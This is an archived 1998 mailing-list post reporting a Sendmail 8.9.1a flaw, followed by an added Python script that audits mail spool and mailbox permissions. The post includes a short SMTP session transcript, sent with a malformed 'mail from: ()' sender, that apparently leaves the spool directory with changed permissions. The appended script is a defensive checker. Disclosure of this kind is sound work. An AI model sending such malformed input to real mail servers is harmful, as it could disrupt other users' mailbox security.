(no subject)

From: Simon Smith (simonat_private)
Date: Thu Sep 24 1998 - 07:14:06 PDT


    This is not the same attack as the last one regarding the "(".
    This one does not make your system hang but rather alters permissions, it
    seems.  If this was already posted please disregard it.
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security
    flaw in it.  I have tested this on Debian Linux.  I have not had time to
    hack the source and find out where the hole is. (Yes I am going to give
    notice to sendmail.)  I have not determined if other systems are open to
    this attack, but to check, create a user that you can eliminate.
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    begin exploit
    
    *****
    bogin:~$ telnet localhost 25
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400
    mail from: ()
    250 MAILER-DAEMON... Sender ok
    rcpt to: tester
    250 tester... Recipient ok
    data
    354 Enter mail, end with "." on a line by itself
    bababababa
    .
    250 JAA15070 Message accepted for delivery
    quit
    221 bogin.ma.ultranet.com closing connection
    Connection closed by foreign host.
    bogin:~$ su - tester
    Password:
    bogin:~$ pine
    *****
    
    end exploit
    
    That is not the least of it.  The mail was sent to tester, but watch what
    happens if I read the mail, then use pine to check e-mail.
    
    I get the following message inside of pine:
    "Mailbox vulnerable - directory must have 1777 protection"
    
    Downgrading to a preliminary version of sendmail will stop this from
    happening to you (8.8.8). If someone were to transmit mail to
    allat_private you would be condemned.
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    
    
    
    Hmmm it was not like that before.
    
    I am still able to read the email... but this causes problems...
    
    
    I apologize that I did not take this any farther.  If anyone wants to dig
    into this please notify me of your findings.
    
    
    Sincerely,
            SIMON
    
    p.s. if this is an old bug please tell me and forward me the details...
    not sure how it could be though seeing as it is the alpha release....  =oP
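As an added, defender-side illustration (not part of Simon's post and not sendmail or pine code), the script below audits a mail spool directory against the condition pine is checking for in its "directory must have 1777 protection" warning: mode 1777 is world-writable (so the local delivery agent and MUAs can create lock files) with the sticky bit set (so users cannot delete or rename each other's mailboxes). It also flags individual mailbox files that are group/world accessible or are symlinks. The spool path (/var/mail on many systems) is an assumption; the demo builds constructed directories under a temp dir rather than touching the real spool.

```python
"""Audit mail spool directory and mailbox permissions (added example).

Constructed assumptions: the spool lives at a path such as /var/mail
(varies per system), and the safe state is the one pine asks for:
directory mode 1777, each mailbox mode 0600 and owned by its user.
"""
import os
import stat
import tempfile
from typing import Dict, List

EXPECTED_SPOOL_MODE = 0o1777   # rwxrwxrwt: world-writable + sticky bit


def audit_spool_dir(path: str) -> List[str]:
    """Return findings for the spool directory; [] means it is 1777."""
    findings: List[str] = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist"]
    if not stat.S_ISDIR(st.st_mode):
        return [f"{path}: is not a directory"]

    mode = stat.S_IMODE(st.st_mode)
    # World-writable without the sticky bit is the dangerous combination:
    # any local user may remove or rename another user's mailbox.
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append(f"{path}: world-writable without sticky bit "
                        f"(mode {mode:04o}); users can delete or rename "
                        f"other users' mailboxes")
    if mode != EXPECTED_SPOOL_MODE:
        findings.append(f"{path}: mode is {mode:04o}, expected "
                        f"{EXPECTED_SPOOL_MODE:04o}")
    return findings


def audit_mailbox(path: str) -> List[str]:
    """Return findings for one mailbox file; [] means owner-only access."""
    findings: List[str] = []
    st = os.lstat(path)
    # A symlink in the spool can redirect delivery to an arbitrary file.
    if stat.S_ISLNK(st.st_mode):
        return [f"{path}: is a symbolic link"]
    if not stat.S_ISREG(st.st_mode):
        return [f"{path}: is not a regular file"]
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"{path}: accessible by group/others "
                        f"(mode {mode:04o}); expected 0600")
    return findings


def audit_spool(path: str) -> List[str]:
    """Audit the directory and every mailbox inside it."""
    findings = audit_spool_dir(path)
    if findings and not os.path.isdir(path):
        return findings
    for name in sorted(os.listdir(path)):
        findings.extend(audit_mailbox(os.path.join(path, name)))
    return findings


def demo() -> Dict[str, List[str]]:
    """Build constructed spool directories in a temp dir and audit them."""
    results: Dict[str, List[str]] = {}
    with tempfile.TemporaryDirectory() as root:
        good = os.path.join(root, "mail_ok")
        os.mkdir(good)
        os.chmod(good, 0o1777)                  # the state pine expects
        with open(os.path.join(good, "tester"), "w") as fh:
            fh.write("From MAILER-DAEMON\n\nbababababa\n")
        os.chmod(os.path.join(good, "tester"), 0o600)

        bad = os.path.join(root, "mail_bad")
        os.mkdir(bad)
        os.chmod(bad, 0o777)                    # sticky bit missing
        with open(os.path.join(bad, "tester"), "w") as fh:
            fh.write("From MAILER-DAEMON\n\nbababababa\n")
        os.chmod(os.path.join(bad, "tester"), 0o666)   # world read/write
        os.symlink("/dev/null", os.path.join(bad, "victim"))

        results["ok"] = audit_spool(good)
        results["bad"] = audit_spool(bad)
    return results


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, "->", findings or "no findings")
```

Run it against a real system with `audit_spool("/var/mail")` (or wherever local mailboxes live) as root; an empty list means the spool is in the state pine accepts, and any finding is the permission change this post reports.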
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:32 PDT